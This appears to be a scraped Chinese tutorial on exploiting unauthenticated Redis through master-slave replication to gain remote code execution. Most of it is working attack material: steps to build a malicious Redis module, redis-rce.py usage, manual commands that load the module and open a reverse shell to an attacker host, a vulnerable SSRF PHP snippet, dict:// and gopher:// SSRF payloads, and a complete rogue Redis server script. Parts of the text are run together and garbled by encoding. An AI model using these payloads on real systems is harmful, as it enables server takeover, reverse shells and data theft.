完全复制一个dict_Redis主从复制getshell技巧
Redis未授權(quán)漏洞常見的漏洞利用方式:
Windows下,絕對(duì)路徑寫webshell 、寫入啟動(dòng)項(xiàng)。
Linux下,絕對(duì)路徑寫webshell 、公私鑰認(rèn)證獲取root權(quán)限 ?、利用contrab計(jì)劃任務(wù)反彈shell。
基于Redis主從復(fù)制的機(jī)制,可以完美無損的將文件同步到從節(jié)點(diǎn)。這就使得它可以輕易實(shí)現(xiàn)以上任何一種漏洞利用方式,而且存在著更多的可能性等待被探索。
一、Redis 主從復(fù)制一鍵自動(dòng)化RCE
在Reids 4.x之后,Redis新增了模塊功能,通過外部拓展,可以實(shí)現(xiàn)在Redis中實(shí)現(xiàn)一個(gè)新的Redis命令,通過寫C語言編譯并加載惡意的.so文件,達(dá)到代碼執(zhí)行的目的。
通過腳本實(shí)現(xiàn)一鍵自動(dòng)化getshell:
1、生成惡意.so文件,下載RedisModules-ExecuteCommand使用make編譯即可生成。
git clone https://github.com/n0b0dyCN/RedisModules-ExecuteCommandcd RedisModules-ExecuteCommand/make2、攻擊端執(zhí)行:python redis-rce.py -r 目標(biāo)ip-p 目標(biāo)端口 -L 本地ip -f 惡意.so
git clone https://github.com/Ridter/redis-rce.gitcd redis-rce/cp ../RedisModules-ExecuteCommand/src/module.so ./pip install -r requirements.txt python redis-rce.py -r 192.168.28.152 -p 6379 -L 192.168.28.137 -f module.so二、Redis主從復(fù)制利用原理
首先,我們通過一個(gè)簡(jiǎn)單的測(cè)試,來熟悉一下slave和master的握手協(xié)議過程:
1、監(jiān)聽本地1234端口
nc -lvvp 12342、將Redis服務(wù)器設(shè)置為從節(jié)點(diǎn)(slave)
slaveof 127.0.0.1 12343、使用nc模擬Redis主服務(wù)器,進(jìn)行模擬Redis主從交互過程(紅色部分為slave發(fā)送的命令):
以上,通過nc進(jìn)行模擬Redis主從復(fù)制的交互過程,同理,如果構(gòu)建模擬一個(gè)Redis服務(wù)器,利用Redis主從復(fù)制的機(jī)制,那么就可以通過FULLRESYNC將任意文件同步到從節(jié)點(diǎn)。
三、Redis主從復(fù)制手動(dòng)擋
手動(dòng)操作過程記錄:
1、編寫腳本,構(gòu)造惡意Redis服務(wù)器,監(jiān)聽本地端口1234,加載exp.so。
python RogueServer.py --lport 1234 --exp exp.so2、通過未授權(quán)訪問連入要攻擊的redis服務(wù)器。
執(zhí)行相關(guān)命令:
#設(shè)置redis的備份路徑為當(dāng)前目錄 config set dir ./#設(shè)置備份文件名為exp.so,默認(rèn)為dump.rdb config set dbfilename exp.so#設(shè)置主服務(wù)器IP和端口 slaveof 192.168.172.129 1234 #加載惡意模塊 module load ./exp.so#切斷主從,關(guān)閉復(fù)制功能 slaveof no one #執(zhí)行系統(tǒng)命令 system.exec 'whoami' system.rev 127.0.0.1 9999 #通過dump.rdb文件恢復(fù)數(shù)據(jù) config set dbfilename dump.rdb#刪除exp.so system.exec 'rm ./exp.so'#卸載system模塊的加載 module unload system成功執(zhí)行系統(tǒng)命令:
四、SSRF+Redis 反彈shell
參照Redis手動(dòng)getshell的過程,可輕易實(shí)現(xiàn)SSRF+Redis反彈shell。
以curl為例,漏洞代碼為ssrf.php:
<?php $ch = curl_init();curl_setopt($ch, CURLOPT_URL, $_GET['url']);#curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_HEADER, 0);#curl_setopt($ch, CURLOPT_PROTOCOLS, CURLPROTO_HTTP | CURLPROTO_HTTPS);curl_exec($ch);curl_close($ch);?>環(huán)境準(zhǔn)備:
模擬內(nèi)網(wǎng)未授權(quán)Redis服務(wù)器:192.168.172.131
模擬攻擊者機(jī)器:192.168.172.129,在攻擊者機(jī)器上構(gòu)建惡意Redis服務(wù)器,同時(shí)監(jiān)聽本地9999端口等待shell返回。
1、利用dict協(xié)議反彈shell
#查看當(dāng)前redis的相關(guān)配置ssrf.php?url=dict://192.168.172.131:6379/info#設(shè)置備份文件名ssrf.php?url=dict://192.168.172.131:6379/config:set:dbfilename:exp.so#連接惡意Redis服務(wù)器ssrf.php?url=dict://192.168.172.131:6379/slaveof:192.168.172.129:1234#加載惡意模塊ssrf.php?url=dict://192.168.172.131:6379/module:load:./exp.so#切斷主從復(fù)制ssrf.php?url=dict://192.168.172.131:6379/slaveof:no:one#執(zhí)行系統(tǒng)命令 ssrf.php?url=dict://192.168.172.131:6379/system.rev:192.168.172.129:99992、利用gopher協(xié)議反彈shell
#設(shè)置文件名,連接惡意Redis服務(wù)器ssrf.php?url=gopher://192.168.172.131:6379/_config%2520set%2520dbfilename%2520exp.so%250d%250aslaveof%2520192.168.172.129%25201234%250d%250aquit#加載exp.so,反彈shellssrf.php?url=gopher://192.168.172.131:6379/_module%2520load%2520./exp.so%250d%250asystem.rev%2520192.168.172.129%25209999%250d%250aquit3、利用這兩種協(xié)議,都可以成功反彈shell。
附:簡(jiǎn)單改寫的模擬Redis服務(wù)端腳本
import socketfrom time import sleepfrom optparse import OptionParserdef RogueServer(lport): resp = "" sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.bind(("0.0.0.0",lport)) sock.listen(10) conn,address = sock.accept() sleep(5) while True: data = conn.recv(1024) if "PING" in data: resp="+PONG"+CLRF conn.send(resp) elif "REPLCONF" in data: resp="+OK"+CLRF conn.send(resp) elif "PSYNC" in data or "SYNC" in data: resp = "+FULLRESYNC " + "Z"*40 + " 1" + CLRF resp += "$" + str(len(payload)) + CLRF resp = resp.encode() resp += payload + CLRF.encode() if type(resp) != bytes: resp =resp.encode() conn.send(resp) #elif "exit" in data: breakif __name__=="__main__": parser = OptionParser() parser.add_option("--lport", dest="lp", type="int",help="rogue server listen port, default 21000", default=21000,metavar="LOCAL_PORT") parser.add_option("-f","--exp", dest="exp", type="string",help="Redis Module to load, default exp.so", default="exp.so",metavar="EXP_FILE") (options , args )= parser.parse_args() lport = options.lp exp_filename = options.exp CLRF="\r\n" payload=open(exp_filename,"rb").read() print "Start listing on port: %s" %lport print "Load the payload: %s" %exp_filename ????RogueServer(lport)總結(jié)
以上是生活随笔為你收集整理的完全复制一个dict_Redis主从复制getshell技巧的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 机智云代码移植_IoT开发者 | 基于S
- 下一篇: mysql多实例主从_window 下